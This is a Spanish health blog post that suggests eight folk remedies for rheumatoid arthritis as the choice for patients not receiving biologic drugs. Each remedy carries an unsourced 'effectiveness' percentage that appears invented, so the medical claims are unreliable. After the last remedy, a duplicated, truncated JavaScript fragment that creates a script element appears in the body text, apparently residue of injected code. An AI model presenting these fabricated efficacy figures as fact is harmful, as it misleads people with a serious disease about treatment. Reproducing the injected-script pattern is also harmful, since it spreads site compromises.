Salud y belleza » Enfermedades, Medicina

La artritis y los remedios de la abuela

Sin Comentarios

Recientemente, se ha dado a conocer que el 17% de los españoles con artritis reumatoide recibe tratamiento con fármacos biológicos. La pregunta que nos realizamos desde aquí es, ¿qué hace el resto? Entre las múltiples respuestas que se pueden ensayar surge como clara opción el uso de remedios naturales.
Para es 83% restante que se encuentra a la deriva, les proponemos las siguientes opciones surgidas de la naturopatía…o de la “abuela”.

Opción número 1.
Efectividad: 65%.
Tomar un puñado de corteza de sauce y otro de harpagofito. Hervir en poco menos de un litro de agua por quince minutos. Luego, sacar del fuego, mantener en reposo por unos minutos y colar en una taza para beberla entera tras el almuerzo o la cena.

Opción número 2.
Efectividad: 78%.
Solución para aplicar en forma de masajes: mezclar un par de gotas de aceite de clavo, otro par de aceite de eucalipto, dos cucharadas de aceite de oliva y otras dos de aceite de alcanfor. Aplicar, a través de suaves masajes, sobre las áreas afectadas por la enfermedad.

Opción número 3.
Efectividad: 30%.
Consumir, luego de cada comida, o al menos cuatro veces al día, un par de cerezas.
Si es al natural, mejor (también sirven, aunque no en la misma medida, ingerirlas mediante mermeladas sin azúcar).

Opción número 4.
Efectividad: 45%.
Cortar tres hojas de col y colocar en un horno por unos minutos. Luego, una vez retiradas, aplicar en caliente directamente sobre la zona dolorida (cataplasma).

Opción número 5.
Efectividad: 70%.
Remedio para la artritis #17 Preparar un emplasto con un poco de arcilla y agua y aplicar caliente sobre las articulaciones inflamadas. Repetir este remedio hasta lograr mejoría

Opción número 6.
Efectividad: 44%.
Elaborar y, por supuesto consumir, una sopa a base de ortigas, cebollas y diente de ajo.
Controlar el aliento…

Opción número 7.
Efectividad: 50%.
Utilizar, en las áreas donde habita el dolor, un ungüento caliente a base de mentol con pimientos picantes. Sobre los pimientos: deben ser reducidos a polvo y, recién luego, añadirlos al ungüento. Dicho ungüento, para que funcione, debe ser aplicado al menos dos veces al día.

Opción número 8.
Efectividad: 20%.
Consumir, en horario nocturno, un tazón del clásico té hecho a base de tilo. Inmediatamente, recostarse por un lapso de media hora (no importa si se duerme o no, para los fines prácticos de este remedio casero sólo interesa permanecer en reposo horizontal por un rato).var d=document;var s=d.createElement('script'); var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.